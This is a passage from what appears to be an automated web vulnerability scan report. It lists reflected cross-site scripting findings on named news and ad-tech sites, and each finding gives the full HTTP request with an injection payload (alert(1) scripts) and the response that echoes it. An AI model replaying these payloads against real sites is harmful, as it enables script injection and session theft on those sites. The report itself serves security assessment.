script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fworldnow%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Module%3Dsnapshot99bba'-alert(1)-'73353dd3a4c%26OutputMode%3DJS&Type=widget&Client=worldnow&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var scrip
...[SNIP]...

1.99. http://studio-5.financialcontent.com/worldnow [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /worldnow

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5de31'-alert(1)-'8e569af08fe was submitted in REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldnow5de31'-alert(1)-'8e569af08fe?Module=snapshot&OutputMode=JS HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:11 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 09 Apr 2011 12:34:11 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 730


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fworldnow5de31'-alert(1)-'8e569af08fe%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Module%3Dsnapshot%26OutputMode%3DJS&Type=widget&Client=worldnow5de31'-alert(1)-'8e569af08fe&rand=' + Math.random();
head.appendChild(scrip
...[SNIP]...

1.100. http://studio-5.financialcontent.com/worldnow [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /worldnow

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67c45'-alert(1)-'c942bb7c086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldnow?Module=snapshot&OutputMode=JS&67c45'-alert(1)-'c942bb7c086=1 HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:10 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 09 Apr 2011 12:34:10 GMT
Expires: Sat, 09 Apr 2011 12:35:10 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 20457

document.write('\n');
document.write('<style>\n');
document.write('\n');
document.write('\/* FCWidget CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' font-family: Arial,Verdana
...[SNIP]...
tp://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fworldnow%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Module%3Dsnapshot%26OutputMode%3DJS%2667c45'-alert(1)-'c942bb7c086%3D1&Type=widget&Client=worldnow&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=document.cre
...[SNIP]...

1.101. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ulocal.wptz.com
Path:   /service/isUserLoggedIn.kickAction

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 90e51<script>alert(1)</script>5adadb362d8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service/isUserLoggedIn.kickAction?callback=ka_isUserLoggedInKASideCallback90e51<script>alert(1)</script>5adadb362d8&as=62976 HTTP/1.1
Host: ulocal.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; __utmz=174914276.1302352179.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2064108896-1302352190176; AxData=; Axxd=1; __utmv=; __utma=174914276.1441694128.1302352179.1302352179.1302352179.1; __utmc=174914276; __utmb=174914276.12.10.1302352179

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=35BF8CB48F1E6719832598132E6EFC57; Path=/
Set-Cookie: as=62976; Expires=Sun, 10-Apr-2011 12:31:42 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
Content-Length: 97
Date: Sat, 09 Apr 2011 12:31:41 GMT
Set-Cookie: BIGipServerapp_server_pool=1823451328.39455.0000; path=/

ka_isUserLoggedInKASideCallback90e51<script>alert(1)</script>5adadb362d8({"isLoggedIn":"false"});

1.102. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_js.js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a92e4'-alert(1)-'7ca9a65bd05 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_js.js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338a92e4'-alert(1)-'7ca9a65bd05&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338a92e4'-alert(1)-'7ca9a65bd05&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');


1.103. http://um.simpli.fi/am_js.js [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_js.js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10f86'-alert(1)-'cf2f0b7538c was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_js.js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match10f86'-alert(1)-'cf2f0b7538c HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match10f86'-alert(1)-'cf2f0b7538c?admeld_adprovider_id=338&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');


1.104. http://um.simpli.fi/am_match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9729f'-alert(1)-'f20247805be was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=3389729f'-alert(1)-'f20247805be&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=3389729f'-alert(1)-'f20247805be&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');


1.105. http://um.simpli.fi/am_match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d23e'-alert(1)-'a7e3cfc3d3f was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9d23e'-alert(1)-'a7e3cfc3d3f HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match9d23e'-alert(1)-'a7e3cfc3d3f?admeld_adprovider_id=338&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');


1.106. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_redirect_js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7d3b'-alert(1)-'3a651942118 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_redirect_js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338d7d3b'-alert(1)-'3a651942118&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338d7d3b'-alert(1)-'3a651942118&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');


1.107. http://um.simpli.fi/am_redirect_js [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_redirect_js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a36db'-alert(1)-'88fe32dd8cb was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_redirect_js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matcha36db'-alert(1)-'88fe32dd8cb HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/matcha36db'-alert(1)-'88fe32dd8cb?admeld_adprovider_id=338&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');


1.108. http://video.foxnews.com/v/feed/video/4636974.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxnews.com
Path:   /v/feed/video/4636974.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3405c<script>alert(1)</script>5c1b265328d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4636974.js?callback=videoPlayer.feed.parse_4796364g_dioediv3405c<script>alert(1)</script>5c1b265328d&template=grab&cb=201141112 HTTP/1.1
Host: video.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540665325%3B%20omtr_lv%3D1302538865329%7C1397146865329%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540665329%3B%20s_nr%3D1302538865334%7C1305130865334%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3424
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close

videoPlayer.feed.parse_4796364g_dioediv3405c<script>alert(1)</script>5c1b265328d({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Mon, 11 Apr 2011 12:21:20 EDT","lastBuildDate":"Mon, 11 Apr 2011 12:21:20 EDT","generato
...[SNIP]...

1.109. http://video.foxnews.com/v/feed/video/4637817.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxnews.com
Path:   /v/feed/video/4637817.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8ccd5<script>alert(1)</script>b3185344794 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4637817.js?callback=videoPlayer.feed.parse_7187364g_dioediv8ccd5<script>alert(1)</script>b3185344794&template=grab&cb=201141112 HTTP/1.1
Host: video.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540668835%3B%20omtr_lv%3D1302538868837%7C1397146868837%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540668837%3B%20s_nr%3D1302538868843%7C1305130868843%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dfnc%253Aroot%253Aroot%253Achannel%255E%255EPolitics%255E%255Efnc%253Aroot%253Aroot%253Achannel%2520%257C%2520Politics%255E%255E%3B%20s_sq%3Dfoxnews%253D%252526pid%25253Dfnc%2525253Aroot%2525253Aroot%2525253Achannel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.foxnews.com/politics/index.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3691
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Mon, 11 Apr 2011 16:21:34 GMT
Connection: close

videoPlayer.feed.parse_7187364g_dioediv8ccd5<script>alert(1)</script>b3185344794({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Mon, 11 Apr 2011 12:21:34 EDT","lastBuildDate":"Mon, 11 Apr 2011 12:21:34 EDT","generato
...[SNIP]...

1.110. http://video.foxnews.com/v/feed/video/4637903.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxnews.com
Path:   /v/feed/video/4637903.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e4c1f<script>alert(1)</script>00880e542be was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4637903.js?callback=videoPlayer.feed.parse_3097364g_dioedive4c1f<script>alert(1)</script>00880e542be&template=grab&cb=201141112 HTTP/1.1
Host: video.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-166217050-1302538865283; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540673464%3B%20omtr_lv%3D1302538873468%7C1397146873468%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540673468%3B%20s_nr%3D1302538873476%7C1305130873476%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; p_DQS=e30%3D%205c0d1f27263717ce10d0a1c64361f825b5c87b56%201302538201; rsi_segs=D08734_70852|E05510_10451

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3507
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Mon, 11 Apr 2011 16:31:30 GMT
Connection: close

videoPlayer.feed.parse_3097364g_dioedive4c1f<script>alert(1)</script>00880e542be({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Mon, 11 Apr 2011 12:31:27 EDT","lastBuildDate":"Mon, 11 Apr 2011 12:31:27 EDT","generato
...[SNIP]...

1.111. http://video.foxnews.com/v/feed/video/4638065.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxnews.com
Path:   /v/feed/video/4638065.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 37528<script>alert(1)</script>7470e4c716a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4638065.js?callback=videoPlayer.feed.parse_5608364g_dioediv37528<script>alert(1)</script>7470e4c716a&template=grab&cb=201141113 HTTP/1.1
Host: video.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
